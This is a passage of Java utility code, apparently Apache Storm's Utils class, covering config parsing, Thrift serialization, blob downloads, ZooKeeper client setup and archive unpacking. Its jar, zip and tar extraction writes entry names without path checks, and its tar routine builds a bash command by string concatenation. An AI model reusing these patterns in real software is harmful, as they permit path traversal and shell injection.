while ((len = in.read(buffer)) >= 0) {
bos.write(buffer, 0, len);
}
in.close();
bos.close();
return bos.toByteArray();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
public static byte[] toCompressedJsonConf(Map<String, Object> stormConf) {
try {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
OutputStreamWriter out = new OutputStreamWriter(new GZIPOutputStream(bos));
JSONValue.writeJSONString(stormConf, out);
out.close();
return bos.toByteArray();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
public static Map<String, Object> fromCompressedJsonConf(byte[] serialized) {
try {
ByteArrayInputStream bis = new ByteArrayInputStream(serialized);
InputStreamReader in = new InputStreamReader(new GZIPInputStream(bis));
Object ret = JSONValue.parseWithException(in);
in.close();
return (Map<String,Object>)ret;
} catch (IOException ioe) {
throw new RuntimeException(ioe);
} catch (ParseException e) {
throw new RuntimeException(e);
}
}
public static <T> String join(Iterable<T> coll, String sep) {
Iterator<T> it = coll.iterator();
StringBuilder ret = new StringBuilder();
while(it.hasNext()) {
ret.append(it.next());
if(it.hasNext()) {
ret.append(sep);
}
}
return ret.toString();
}
public static long bitXorVals(List<Long> coll) {
long result = 0;
for (Long val : coll) {
result ^= val;
}
return result;
}
public static void sleep(long millis) {
try {
Time.sleep(millis);
} catch(InterruptedException e) {
throw new RuntimeException(e);
}
}
public static List<URL> findResources(String name) {
try {
Enumeration<URL> resources = Thread.currentThread().getContextClassLoader().getResources(name);
List<URL> ret = new ArrayList<URL>();
while (resources.hasMoreElements()) {
ret.add(resources.nextElement());
}
return ret;
} catch(IOException e) {
throw new RuntimeException(e);
}
}
public static Map findAndReadConfigFile(String name, boolean mustExist) {
InputStream in = null;
boolean confFileEmpty = false;
try {
in = getConfigFileInputStream(name);
if (null != in) {
Yaml yaml = new Yaml(new SafeConstructor());
Map ret = (Map) yaml.load(new InputStreamReader(in));
if (null != ret) {
return new HashMap(ret);
} else {
confFileEmpty = true;
}
}
if (mustExist) {
if(confFileEmpty)
throw new RuntimeException("Config file " + name + " doesn't have any valid storm configs");
else
throw new RuntimeException("Could not find config file on classpath " + name);
} else {
return new HashMap();
}
} catch (IOException e) {
throw new RuntimeException(e);
} finally {
if (null != in) {
try {
in.close();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
}
}
private static InputStream getConfigFileInputStream(String configFilePath)
throws IOException {
if (null == configFilePath) {
throw new IOException(
"Could not find config file, name not specified");
}
HashSet<URL> resources = new HashSet<URL>(findResources(configFilePath));
if (resources.isEmpty()) {
File configFile = new File(configFilePath);
if (configFile.exists()) {
return new FileInputStream(configFile);
}
} else if (resources.size() > 1) {
throw new IOException(
"Found multiple " + configFilePath
+ " resources. You're probably bundling the Storm jars with your topology jar. "
+ resources);
} else {
LOG.debug("Using "+configFilePath+" from resources");
URL resource = resources.iterator().next();
return resource.openStream();
}
return null;
}
public static Map findAndReadConfigFile(String name) {
return findAndReadConfigFile(name, true);
}
public static Map readDefaultConfig() {
return findAndReadConfigFile("defaults.yaml", true);
}
public static Map readCommandLineOpts() {
Map ret = new HashMap();
String commandOptions = System.getProperty("storm.options");
if (commandOptions != null) {
            /*
             The regex below uses a negative lookahead so it does not split in the middle of JSON objects '{}'
             or JSON arrays '[]'. This is needed to parse valid JSON objects/arrays passed as options
             via 'storm.cmd' on Windows. This is not an issue when using 'storm.py', since it url-encodes
             the options and the regex then just splits on the commas that separate each option.
             Note: this regex handles only valid JSON strings and could produce invalid results
             if the options contain un-encoded invalid JSON or strings with unmatched '[', ']', '{' or '}'. We can
             replace the code below with split(",") once 'storm.cmd' is fixed to send url-encoded options.
             */
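            // Example (hypothetical option string): "topology.debug=true,conf={\"a\":[1,2]}" splits into
            // "topology.debug=true" and "conf={\"a\":[1,2]}"; the comma inside the JSON array is not a split point.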
String[] configs = commandOptions.split(",(?![^\\[\\]{}]*(]|}))");
for (String config : configs) {
config = URLDecoder.decode(config);
String[] options = config.split("=", 2);
if (options.length == 2) {
Object val = options[1];
try {
val = JSONValue.parseWithException(options[1]);
} catch (ParseException ignored) {
//fall back to string, which is already set
}
ret.put(options[0], val);
}
}
}
return ret;
}
public static Map readStormConfig() {
Map ret = readDefaultConfig();
String confFile = System.getProperty("storm.conf.file");
Map storm;
if (confFile == null || confFile.equals("")) {
storm = findAndReadConfigFile("storm.yaml", false);
} else {
storm = findAndReadConfigFile(confFile, true);
}
ret.putAll(storm);
ret.putAll(readCommandLineOpts());
return ret;
}
private static Object normalizeConf(Object conf) {
if (conf == null) return new HashMap();
if (conf instanceof Map) {
Map<Object, Object> confMap = new HashMap((Map) conf);
for (Map.Entry<Object, Object> entry : confMap.entrySet()) {
confMap.put(entry.getKey(), normalizeConf(entry.getValue()));
}
return confMap;
} else if (conf instanceof List) {
List confList = new ArrayList((List) conf);
for (int i = 0; i < confList.size(); i++) {
Object val = confList.get(i);
confList.set(i, normalizeConf(val));
}
return confList;
} else if (conf instanceof Integer) {
return ((Integer) conf).longValue();
} else if (conf instanceof Float) {
return ((Float) conf).doubleValue();
} else {
return conf;
}
}
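    // JSON parsing produces Longs and Doubles, so normalizing numeric types first lets isValidConf
    // compare a conf map with its JSON round-trip for structural equality.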
public static boolean isValidConf(Map<String, Object> stormConf) {
return normalizeConf(stormConf).equals(normalizeConf((Map) JSONValue.parse(JSONValue.toJSONString(stormConf))));
}
public static Object getSetComponentObject(ComponentObject obj) {
if (obj.getSetField() == ComponentObject._Fields.SERIALIZED_JAVA) {
return Utils.javaDeserialize(obj.get_serialized_java(), Serializable.class);
} else if (obj.getSetField() == ComponentObject._Fields.JAVA_OBJECT) {
return obj.get_java_object();
} else {
return obj.get_shell();
}
}
public static <S, T> T get(Map<S, T> m, S key, T def) {
T ret = m.get(key);
if (ret == null) {
ret = def;
}
return ret;
}
public static List<Object> tuple(Object... values) {
List<Object> ret = new ArrayList<Object>();
for (Object v : values) {
ret.add(v);
}
return ret;
}
public static Localizer createLocalizer(Map conf, String baseDir) {
return new Localizer(conf, baseDir);
}
public static ClientBlobStore getClientBlobStoreForSupervisor(Map conf) {
ClientBlobStore store = (ClientBlobStore) newInstance(
(String) conf.get(Config.SUPERVISOR_BLOBSTORE));
store.prepare(conf);
return store;
}
public static BlobStore getNimbusBlobStore(Map conf, NimbusInfo nimbusInfo) {
return getNimbusBlobStore(conf, null, nimbusInfo);
}
public static BlobStore getNimbusBlobStore(Map conf, String baseDir, NimbusInfo nimbusInfo) {
String type = (String)conf.get(Config.NIMBUS_BLOBSTORE);
if (type == null) {
type = LocalFsBlobStore.class.getName();
}
BlobStore store = (BlobStore) newInstance(type);
HashMap nconf = new HashMap(conf);
// only enable cleanup of blobstore on nimbus
nconf.put(Config.BLOBSTORE_CLEANUP_ENABLE, Boolean.TRUE);
if(store != null) {
// store can be null during testing when mocking utils.
store.prepare(nconf, baseDir, nimbusInfo);
}
return store;
}
    /**
     * Meant to be called only by the supervisor for stormjar/stormconf/stormcode files.
     * @param key the blob store key to download
     * @param localFile the local file path the blob is written to
     * @param cb the client blob store to download from
     * @throws AuthorizationException
     * @throws KeyNotFoundException
     * @throws IOException
     */
public static void downloadResourcesAsSupervisor(String key, String localFile,
ClientBlobStore cb) throws AuthorizationException, KeyNotFoundException, IOException {
final int MAX_RETRY_ATTEMPTS = 2;
final int ATTEMPTS_INTERVAL_TIME = 100;
for (int retryAttempts = 0; retryAttempts < MAX_RETRY_ATTEMPTS; retryAttempts++) {
if (downloadResourcesAsSupervisorAttempt(cb, key, localFile)) {
break;
}
Utils.sleep(ATTEMPTS_INTERVAL_TIME);
}
}
public static ClientBlobStore getClientBlobStore(Map conf) {
ClientBlobStore store = (ClientBlobStore) Utils.newInstance((String) conf.get(Config.CLIENT_BLOBSTORE));
store.prepare(conf);
return store;
}
private static boolean downloadResourcesAsSupervisorAttempt(ClientBlobStore cb, String key, String localFile) {
boolean isSuccess = false;
FileOutputStream out = null;
InputStreamWithMeta in = null;
try {
out = new FileOutputStream(localFile);
in = cb.getBlob(key);
long fileSize = in.getFileLength();
byte[] buffer = new byte[1024];
int len;
long downloadFileSize = 0; // long so blobs larger than 2 GB do not overflow the counter
while ((len = in.read(buffer)) >= 0) {
out.write(buffer, 0, len);
downloadFileSize += len;
}
isSuccess = (fileSize == downloadFileSize);
} catch (TException | IOException e) {
LOG.error("An exception happened while downloading {} from blob store.", localFile, e);
} finally {
try {
if (out != null) {
out.close();
}
} catch (IOException ignored) {}
try {
if (in != null) {
in.close();
}
} catch (IOException ignored) {}
}
if (!isSuccess) {
try {
Files.deleteIfExists(Paths.get(localFile));
} catch (IOException ex) {
LOG.error("Failed trying to delete the partially downloaded {}", localFile, ex);
}
}
return isSuccess;
}
public static boolean checkFileExists(String path) {
return Files.exists(new File(path).toPath());
}
public static boolean checkFileExists(String dir, String file) {
return checkFileExists(dir + "/" + file);
}
public static boolean CheckDirExists(String dir) {
File file = new File(dir);
return file.isDirectory();
}
public static long nimbusVersionOfBlob(String key, ClientBlobStore cb) throws AuthorizationException, KeyNotFoundException {
long nimbusBlobVersion = 0;
ReadableBlobMeta metadata = cb.getBlobMeta(key);
nimbusBlobVersion = metadata.get_version();
return nimbusBlobVersion;
}
public static String getFileOwner(String path) throws IOException {
return Files.getOwner(FileSystems.getDefault().getPath(path)).getName();
}
public static long localVersionOfBlob(String localFile) {
File f = new File(localFile + DEFAULT_BLOB_VERSION_SUFFIX);
long currentVersion = 0;
if (f.exists() && !(f.isDirectory())) {
BufferedReader br = null;
try {
br = new BufferedReader(new FileReader(f));
String line = br.readLine();
currentVersion = Long.parseLong(line);
} catch (IOException e) {
throw new RuntimeException(e);
} finally {
try {
if (br != null) {
br.close();
}
} catch (Exception ignore) {
LOG.error("Exception trying to cleanup", ignore);
}
}
return currentVersion;
} else {
return -1;
}
}
public static String constructBlobWithVersionFileName(String fileName, long version) {
return fileName + "." + version;
}
public static String constructBlobCurrentSymlinkName(String fileName) {
return fileName + Utils.DEFAULT_CURRENT_BLOB_SUFFIX;
}
public static String constructVersionFileName(String fileName) {
return fileName + Utils.DEFAULT_BLOB_VERSION_SUFFIX;
}
// only works on operating systems that support posix
public static void restrictPermissions(String baseDir) {
try {
Set<PosixFilePermission> perms = new HashSet<PosixFilePermission>(
Arrays.asList(PosixFilePermission.OWNER_READ, PosixFilePermission.OWNER_WRITE,
PosixFilePermission.OWNER_EXECUTE, PosixFilePermission.GROUP_READ,
PosixFilePermission.GROUP_EXECUTE));
Files.setPosixFilePermissions(FileSystems.getDefault().getPath(baseDir), perms);
} catch (IOException e) {
throw new RuntimeException(e);
}
}
public static synchronized clojure.lang.IFn loadClojureFn(String namespace, String name) {
try {
clojure.lang.Compiler.eval(RT.readString("(require '" + namespace + ")"));
} catch (Exception e) {
//if playing from the repl and defining functions, file won't exist
}
return (clojure.lang.IFn) RT.var(namespace, name).deref();
}
public static boolean isSystemId(String id) {
return id.startsWith("__");
}
public static ComponentCommon getComponentCommon(StormTopology topology, String id) {
if (topology.get_spouts().containsKey(id)) {
return topology.get_spouts().get(id).get_common();
}
if (topology.get_bolts().containsKey(id)) {
return topology.get_bolts().get(id).get_common();
}
if (topology.get_state_spouts().containsKey(id)) {
return topology.get_state_spouts().get(id).get_common();
}
throw new IllegalArgumentException("Could not find component with id " + id);
}
public static List<String> getStrings(final Object o) {
if (o == null) {
return new ArrayList<String>();
} else if (o instanceof String) {
return new ArrayList<String>() {{ add((String) o); }};
} else if (o instanceof Collection) {
List<String> answer = new ArrayList<String>();
for (Object v : (Collection) o) {
answer.add(v.toString());
}
return answer;
} else {
throw new IllegalArgumentException("Don't know how to convert to string list");
}
}
public static String getString(Object o) {
if (null == o) {
throw new IllegalArgumentException("Don't know how to convert null to String");
}
return o.toString();
}
public static Integer getInt(Object o) {
Integer result = getInt(o, null);
if (null == result) {
throw new IllegalArgumentException("Don't know how to convert null to int");
}
return result;
}
private static TDeserializer getDes() {
TDeserializer des = threadDes.get();
if(des == null) {
des = new TDeserializer();
threadDes.set(des);
}
return des;
}
public static byte[] thriftSerialize(TBase t) {
try {
TSerializer ser = threadSer.get();
if (ser == null) {
ser = new TSerializer();
threadSer.set(ser);
}
return ser.serialize(t);
} catch (TException e) {
LOG.error("Failed to serialize to thrift: ", e);
throw new RuntimeException(e);
}
}
public static <T> T thriftDeserialize(Class c, byte[] b) {
try {
return Utils.thriftDeserialize(c, b, 0, b.length);
} catch (Exception e) {
throw new RuntimeException(e);
}
}
public static Integer getInt(Object o, Integer defaultValue) {
if (null == o) {
return defaultValue;
}
if (o instanceof Integer ||
o instanceof Short ||
o instanceof Byte) {
return ((Number) o).intValue();
} else if (o instanceof Long) {
final long l = (Long) o;
if (l <= Integer.MAX_VALUE && l >= Integer.MIN_VALUE) {
return (int) l;
}
} else if (o instanceof String) {
return Integer.parseInt((String) o);
}
throw new IllegalArgumentException("Don't know how to convert " + o + " to int");
}
public static Double getDouble(Object o) {
Double result = getDouble(o, null);
if (null == result) {
throw new IllegalArgumentException("Don't know how to convert null to double");
}
return result;
}
public static Double getDouble(Object o, Double defaultValue) {
if (null == o) {
return defaultValue;
}
if (o instanceof Number) {
return ((Number) o).doubleValue();
} else {
throw new IllegalArgumentException("Don't know how to convert " + o + " + to double");
}
}
public static boolean getBoolean(Object o, boolean defaultValue) {
if (null == o) {
return defaultValue;
}
if (o instanceof Boolean) {
return (Boolean) o;
} else {
throw new IllegalArgumentException("Don't know how to convert " + o + " + to boolean");
}
}
public static String getString(Object o, String defaultValue) {
if (null == o) {
return defaultValue;
}
if (o instanceof String) {
return (String) o;
} else {
throw new IllegalArgumentException("Don't know how to convert " + o + " + to String");
}
}
public static long secureRandomLong() {
return UUID.randomUUID().getLeastSignificantBits();
}
/**
* Unpack matching files from a jar. Entries inside the jar that do
* not match the given pattern will be skipped.
*
* @param jarFile the .jar file to unpack
* @param toDir the destination directory into which to unpack the jar
*/
public static void unJar(File jarFile, File toDir)
throws IOException {
JarFile jar = new JarFile(jarFile);
try {
Enumeration<JarEntry> entries = jar.entries();
while (entries.hasMoreElements()) {
final JarEntry entry = entries.nextElement();
if (!entry.isDirectory()) {
InputStream in = jar.getInputStream(entry);
try {
File file = new File(toDir, entry.getName());
ensureDirectory(file.getParentFile());
OutputStream out = new FileOutputStream(file);
try {
copyBytes(in, out, 8192);
} finally {
out.close();
}
} finally {
in.close();
}
}
}
} finally {
jar.close();
}
}
/**
* Copies from one stream to another.
*
* @param in InputStream to read from
* @param out OutputStream to write to
* @param buffSize the size of the buffer
*/
public static void copyBytes(InputStream in, OutputStream out, int buffSize)
throws IOException {
PrintStream ps = out instanceof PrintStream ? (PrintStream)out : null;
byte buf[] = new byte[buffSize];
int bytesRead = in.read(buf);
while (bytesRead >= 0) {
out.write(buf, 0, bytesRead);
if ((ps != null) && ps.checkError()) {
throw new IOException("Unable to write to output stream.");
}
bytesRead = in.read(buf);
}
}
/**
* Ensure the existence of a given directory.
*
* @throws IOException if it cannot be created and does not already exist
*/
private static void ensureDirectory(File dir) throws IOException {
if (!dir.mkdirs() && !dir.isDirectory()) {
throw new IOException("Mkdirs failed to create " +
dir.toString());
}
}
/**
* Given a tar file as input, it will untar the file into the untar directory
* passed as the second parameter.
* <p/>
* This utility will untar ".tar" files and ".tar.gz"/".tgz" files.
*
* @param inFile The tar file as input.
* @param untarDir The untar directory where to untar the tar file.
* @throws IOException
*/
public static void unTar(File inFile, File untarDir) throws IOException {
if (!untarDir.mkdirs()) {
if (!untarDir.isDirectory()) {
throw new IOException("Mkdirs failed to create " + untarDir);
}
}
boolean gzipped = inFile.toString().endsWith("gz");
if (isOnWindows()) {
// Tar is not native to Windows. Use simple Java based implementation for
// tests and simple tar archives
unTarUsingJava(inFile, untarDir, gzipped);
} else {
// spawn tar utility to untar archive for full fledged unix behavior such
// as resolving symlinks in tar archives
unTarUsingTar(inFile, untarDir, gzipped);
}
}
private static void unTarUsingTar(File inFile, File untarDir,
boolean gzipped) throws IOException {
StringBuffer untarCommand = new StringBuffer();
if (gzipped) {
untarCommand.append(" gzip -dc '");
untarCommand.append(inFile.toString());
untarCommand.append("' | (");
}
untarCommand.append("cd '");
untarCommand.append(untarDir.toString());
untarCommand.append("' ; ");
untarCommand.append("tar -xf ");
if (gzipped) {
untarCommand.append(" -)");
} else {
untarCommand.append(inFile.toString());
}
String[] shellCmd = {"bash", "-c", untarCommand.toString()};
ShellUtils.ShellCommandExecutor shexec = new ShellUtils.ShellCommandExecutor(shellCmd);
shexec.execute();
int exitcode = shexec.getExitCode();
if (exitcode != 0) {
throw new IOException("Error untarring file " + inFile +
". Tar process exited with exit code " + exitcode);
}
}
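// For reference, the shell pipeline built by unTarUsingTar above looks roughly like the following
// (paths are hypothetical):
//   gzip -dc '/tmp/topology.tar.gz' | (cd '/tmp/dest' ; tar -xf -)     for a gzipped archive
//   cd '/tmp/dest' ; tar -xf /tmp/topology.tar                         for a plain tar archive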
private static void unTarUsingJava(File inFile, File untarDir,
boolean gzipped) throws IOException {
InputStream inputStream = null;
try {
if (gzipped) {
inputStream = new BufferedInputStream(new GZIPInputStream(
new FileInputStream(inFile)));
} else {
inputStream = new BufferedInputStream(new FileInputStream(inFile));
}
try (TarArchiveInputStream tis = new TarArchiveInputStream(inputStream)) {
for (TarArchiveEntry entry = tis.getNextTarEntry(); entry != null; ) {
unpackEntries(tis, entry, untarDir);
entry = tis.getNextTarEntry();
}
}
} finally {
if(inputStream != null) {
inputStream.close();
}
}
}
private static void unpackEntries(TarArchiveInputStream tis,
TarArchiveEntry entry, File outputDir) throws IOException {
if (entry.isDirectory()) {
File subDir = new File(outputDir, entry.getName());
if (!subDir.mkdirs() && !subDir.isDirectory()) {
throw new IOException("Mkdirs failed to create tar internal dir "
+ outputDir);
}
for (TarArchiveEntry e : entry.getDirectoryEntries()) {
unpackEntries(tis, e, subDir);
}
return;
}
File outputFile = new File(outputDir, entry.getName());
if (!outputFile.getParentFile().exists()) {
if (!outputFile.getParentFile().mkdirs()) {
throw new IOException("Mkdirs failed to create tar internal dir "
+ outputDir);
}
}
int count;
byte data[] = new byte[2048];
BufferedOutputStream outputStream = new BufferedOutputStream(
new FileOutputStream(outputFile));
while ((count = tis.read(data)) != -1) {
outputStream.write(data, 0, count);
}
outputStream.flush();
outputStream.close();
}
public static boolean isOnWindows() {
if (System.getenv("OS") != null) {
return System.getenv("OS").equals("Windows_NT");
}
return false;
}
public static boolean isAbsolutePath(String path) {
return Paths.get(path).isAbsolute();
}
public static void unpack(File localrsrc, File dst) throws IOException {
String lowerDst = localrsrc.getName().toLowerCase();
if (lowerDst.endsWith(".jar")) {
unJar(localrsrc, dst);
} else if (lowerDst.endsWith(".zip")) {
unZip(localrsrc, dst);
} else if (lowerDst.endsWith(".tar.gz") ||
lowerDst.endsWith(".tgz") ||
lowerDst.endsWith(".tar")) {
unTar(localrsrc, dst);
} else {
LOG.warn("Cannot unpack " + localrsrc);
if (!localrsrc.renameTo(dst)) {
throw new IOException("Unable to rename file: [" + localrsrc
+ "] to [" + dst + "]");
}
}
if (localrsrc.isFile()) {
localrsrc.delete();
}
}
public static boolean canUserReadBlob(ReadableBlobMeta meta, String user) {
SettableBlobMeta settable = meta.get_settable();
for (AccessControl acl : settable.get_acl()) {
if (acl.get_type().equals(AccessControlType.OTHER) && (acl.get_access() & BlobStoreAclHandler.READ) > 0) {
return true;
}
if (acl.get_name().equals(user) && (acl.get_access() & BlobStoreAclHandler.READ) > 0) {
return true;
}
}
return false;
}
public static CuratorFramework newCurator(Map conf, List<String> servers, Object port, String root) {
return newCurator(conf, servers, port, root, null);
}
public static CuratorFramework newCurator(Map conf, List<String> servers, Object port, ZookeeperAuthInfo auth) {
return newCurator(conf, servers, port, "", auth);
}
public static CuratorFramework newCurator(Map conf, List<String> servers, Object port, String root, ZookeeperAuthInfo auth) {
List<String> serverPorts = new ArrayList<String>();
for (String zkServer : servers) {
serverPorts.add(zkServer + ":" + Utils.getInt(port));
}
String zkStr = StringUtils.join(serverPorts, ",") + root;
CuratorFrameworkFactory.Builder builder = CuratorFrameworkFactory.builder();
setupBuilder(builder, zkStr, conf, auth);
return builder.build();
}
protected static void setupBuilder(CuratorFrameworkFactory.Builder builder, final String zkStr, Map conf, ZookeeperAuthInfo auth)
{
List<String> exhibitorServers = getStrings(conf.get(Config.STORM_EXHIBITOR_SERVERS));
if (!exhibitorServers.isEmpty()) {
// use exhibitor servers
builder.ensembleProvider(new ExhibitorEnsembleProvider(
new Exhibitors(exhibitorServers, Utils.getInt(conf.get(Config.STORM_EXHIBITOR_PORT)),
new Exhibitors.BackupConnectionStringProvider() {
@Override
public String getBackupConnectionString() throws Exception {
// use zk servers as backup if they exist
return zkStr;
}}),
new DefaultExhibitorRestClient(),
Utils.getString(conf.get(Config.STORM_EXHIBITOR_URIPATH)),
Utils.getInt(conf.get(Config.STORM_EXHIBITOR_POLL)),
new StormBoundedExponentialBackoffRetry(
Utils.getInt(conf.get(Config.STORM_EXHIBITOR_RETRY_INTERVAL)),
Utils.getInt(conf.get(Config.STORM_EXHIBITOR_RETRY_INTERVAL_CEILING)),
Utils.getInt(conf.get(Config.STORM_EXHIBITOR_RETRY_TIMES)))));
} else {
builder.connectString(zkStr);
}
builder
.connectionTimeoutMs(Utils.getInt(conf.get(Config.STORM_ZOOKEEPER_CONNECTION_TIMEOUT)))
.sessionTimeoutMs(Utils.getInt(conf.get(Config.STORM_ZOOKEEPER_SESSION_TIMEOUT)))
.retryPolicy(new StormBoundedExponentialBackoffRetry(
Utils.getInt(conf.get(Config.STORM_ZOOKEEPER_RETRY_INTERVAL)),
Utils.getInt(conf.get(Config.STORM_ZOOKEEPER_RETRY_INTERVAL_CEILING)),
Utils.getInt(conf.get(Config.STORM_ZOOKEEPER_RETRY_TIMES))));
if (auth != null && auth.scheme != null && auth.payload != null) {
builder.authorization(auth.scheme, auth.payload);
}
}
public static void testSetupBuilder(CuratorFrameworkFactory.Builder
builder, String zkStr, Map conf, ZookeeperAuthInfo auth)
{
setupBuilder(builder, zkStr, conf, auth);
}
public static CuratorFramework newCuratorStarted(Map conf, List<String> servers, Object port, String root, ZookeeperAuthInfo auth) {
CuratorFramework ret = newCurator(conf, servers, port, root, auth);
ret.start();
return ret;
}
public static CuratorFramework newCuratorStarted(Map conf, List<String> servers, Object port, ZookeeperAuthInfo auth) {
CuratorFramework ret = newCurator(conf, servers, port, auth);
ret.start();
return ret;
}
public static TreeMap<Integer, Integer> integerDivided(int sum, int numPieces) {
int base = sum / numPieces;
int numInc = sum % numPieces;
int numBases = numPieces - numInc;
TreeMap<Integer, Integer> ret = new TreeMap<Integer, Integer>();
ret.put(base, numBases);
if (numInc != 0) {
ret.put(base+1, numInc);
}
return ret;
}
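// Illustrative example for integerDivided above (not part of the original source):
//   integerDivided(10, 3) -> {3=2, 4=1}, i.e. two pieces of size 3 and one piece of size 4.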
public static byte[] toByteArray(ByteBuffer buffer) {
byte[] ret = new byte[buffer.remaining()];
buffer.get(ret, 0, ret.length);
return ret;
}
public static void readAndLogStream(String prefix, InputStream in) {
try {
BufferedReader r = new BufferedReader(new InputStreamReader(in));
String line = null;
while ((line = r.readLine()) != null) {
LOG.info("{}:{}", prefix, line);
}
} catch (IOException e) {
LOG.warn("Error while trying to log stream", e);
}
}
/**
* Checks if a throwable is an instance of a particular class
* @param klass The class you're expecting
* @param throwable The throwable you expect to be an instance of klass
* @return true if throwable is instance of klass, false otherwise.
*/
public static boolean exceptionCauseIsInstanceOf(Class klass, Throwable throwable) {
Throwable t = throwable;
while (t != null) {
if (klass.isInstance(t)) {
return true;
}
t = t.getCause();
}
return false;
}
/**
* Is the cluster configured to interact with ZooKeeper in a secure way?
* This only works when called from within Nimbus or a Supervisor process.
* @param conf the storm configuration, not the topology configuration
* @return true if it is configured else false.
*/
public static boolean isZkAuthenticationConfiguredStormServer(Map conf) {
return null != System.getProperty("java.security.auth.login.config")
|| (conf != null
&& conf.get(Config.STORM_ZOOKEEPER_AUTH_SCHEME) != null
&& !((String)conf.get(Config.STORM_ZOOKEEPER_AUTH_SCHEME)).isEmpty());
}
/**
* Is the topology configured to have ZooKeeper authentication.
* @param conf the topology configuration
* @return true if ZK is configured else false
*/
public static boolean isZkAuthenticationConfiguredTopology(Map conf) {
return (conf != null
&& conf.get(Config.STORM_ZOOKEEPER_TOPOLOGY_AUTH_SCHEME) != null
&& !((String)conf.get(Config.STORM_ZOOKEEPER_TOPOLOGY_AUTH_SCHEME)).isEmpty());
}
public static List<ACL> getWorkerACL(Map conf) {
//This is a work around to an issue with ZK where a sasl super user is not super unless there is an open SASL ACL so we are trying to give the correct perms
if (!isZkAuthenticationConfiguredTopology(conf)) {
return null;
}
String stormZKUser = (String)conf.get(Config.STORM_ZOOKEEPER_SUPERACL);
if (stormZKUser == null) {
throw new IllegalArgumentException("Authentication is enabled but " + Config.STORM_ZOOKEEPER_SUPERACL + " is not set");
}
String[] split = stormZKUser.split(":", 2);
if (split.length != 2) {
throw new IllegalArgumentException(Config.STORM_ZOOKEEPER_SUPERACL + " does not appear to be in the form scheme:acl, i.e. sasl:storm-user");
}
ArrayList<ACL> ret = new ArrayList<ACL>(ZooDefs.Ids.CREATOR_ALL_ACL);
ret.add(new ACL(ZooDefs.Perms.ALL, new Id(split[0], split[1])));
return ret;
}
/**
* Takes an input dir or file and returns the disk usage on that local directory.
* Very basic implementation.
*
* @param dir The input dir to get the disk space of this local dir
* @return The total disk space of the input local directory
*/
public static long getDU(File dir) {
long size = 0;
if (!dir.exists()) {
return 0;
}
if (!dir.isDirectory()) {
return dir.length();
} else {
File[] allFiles = dir.listFiles();
if(allFiles != null) {
for (int i = 0; i < allFiles.length; i++) {
boolean isSymLink;
try {
isSymLink = org.apache.commons.io.FileUtils.isSymlink(allFiles[i]);
} catch(IOException ioe) {
isSymLink = true;
}
if(!isSymLink) {
size += getDU(allFiles[i]);
}
}
}
return size;
}
}
/**
* Gets some information, including stack trace, for a running thread.
* @return A human-readable string of the dump.
*/
public static String threadDump() {
final StringBuilder dump = new StringBuilder();
final java.lang.management.ThreadMXBean threadMXBean = java.lang.management.ManagementFactory.getThreadMXBean();
final java.lang.management.ThreadInfo[] threadInfos = threadMXBean.getThreadInfo(threadMXBean.getAllThreadIds(), 100);
for (java.lang.management.ThreadInfo threadInfo : threadInfos) {
dump.append('"');
dump.append(threadInfo.getThreadName());
dump.append("\" ");
final Thread.State state = threadInfo.getThreadState();
dump.append("\n java.lang.Thread.State: ");
dump.append(state);
final StackTraceElement[] stackTraceElements = threadInfo.getStackTrace();
for (final StackTraceElement stackTraceElement : stackTraceElements) {
dump.append("\n at ");
dump.append(stackTraceElement);
}
dump.append("\n\n");
}
return dump.toString();
}
/**
* Creates an instance of the pluggable SerializationDelegate or falls back to
* DefaultSerializationDelegate if something goes wrong.
* @param stormConf The config from which to pull the name of the pluggable class.
* @return an instance of the class specified by storm.meta.serialization.delegate
*/
private static SerializationDelegate getSerializationDelegate(Map stormConf) {
String delegateClassName = (String)stormConf.get(Config.STORM_META_SERIALIZATION_DELEGATE);
SerializationDelegate delegate;
try {
Class delegateClass = Class.forName(delegateClassName);
delegate = (SerializationDelegate) delegateClass.newInstance();
} catch (ClassNotFoundException | InstantiationException | IllegalAccessException e) {
LOG.error("Failed to construct serialization delegate, falling back to default", e);
delegate = new DefaultSerializationDelegate();
}
delegate.prepare(stormConf);
return delegate;
}
public static void handleUncaughtException(Throwable t) {
if (t != null && t instanceof Error) {
if (t instanceof OutOfMemoryError) {
try {
System.err.println("Halting due to Out Of Memory Error..." + Thread.currentThread().getName());
} catch (Throwable err) {
//Again we don't want to exit because of logging issues.
}
Runtime.getRuntime().halt(-1);
} else {
//Running in daemon mode, we would pass Error to calling thread.
throw (Error) t;
}
}
}
/**
* Given a zip file as input, it will unzip the file into the unzip directory
* passed as the second parameter.
* @param inFile The zip file as input
* @param unzipDir The unzip directory where to unzip the zip file.
* @throws IOException
*/
public static void unZip(File inFile, File unzipDir) throws IOException {
Enumeration<? extends ZipEntry> entries;
ZipFile zipFile = new ZipFile(inFile);
try {
entries = zipFile.entries();
while (entries.hasMoreElements()) {
ZipEntry entry = entries.nextElement();
if (!entry.isDirectory()) {
InputStream in = zipFile.getInputStream(entry);
try {
File file = new File(unzipDir, entry.getName());
if (!file.getParentFile().mkdirs()) {
if (!file.getParentFile().isDirectory()) {
throw new IOException("Mkdirs failed to create " +
file.getParentFile().toString());
}
}
OutputStream out = new FileOutputStream(file);
try {
byte[] buffer = new byte[8192];
int i;
while ((i = in.read(buffer)) != -1) {
out.write(buffer, 0, i);
}
} finally {
out.close();
}
} finally {
in.close();
}
}
}
} finally {
zipFile.close();
}
}
/**
* Given a zip file as input it will return its size.
* Only works for zip files whose uncompressed size is less than 4 GB;
* otherwise it returns the size modulo 2^32, per the gzip specification.
* @param myFile The zip file as input
* @throws IOException
* @return zip file size as a long
*/
public static long zipFileSize(File myFile) throws IOException{
RandomAccessFile raf = new RandomAccessFile(myFile, "r");
raf.seek(raf.length() - 4);
long b4 = raf.read();
long b3 = raf.read();
long b2 = raf.read();
long b1 = raf.read();
long val = (b1 << 24) | (b2 << 16) | (b3 << 8) | b4;
raf.close();
return val;
}
public static double zeroIfNaNOrInf(double x) {
return (Double.isNaN(x) || Double.isInfinite(x)) ? 0.0 : x;
}
/**
* parses the arguments to extract jvm heap memory size in MB.
* @param input
* @param defaultValue
* @return the value of the JVM heap memory setting (in MB) in a java command.
*/
public static Double parseJvmHeapMemByChildOpts(String input, Double defaultValue) {
if (input != null) {
Pattern optsPattern = Pattern.compile("Xmx[0-9]+[mkgMKG]");
Matcher m = optsPattern.matcher(input);
String memoryOpts = null;
while (m.find()) {
memoryOpts = m.group();
}
if (memoryOpts != null) {
int unit = 1;
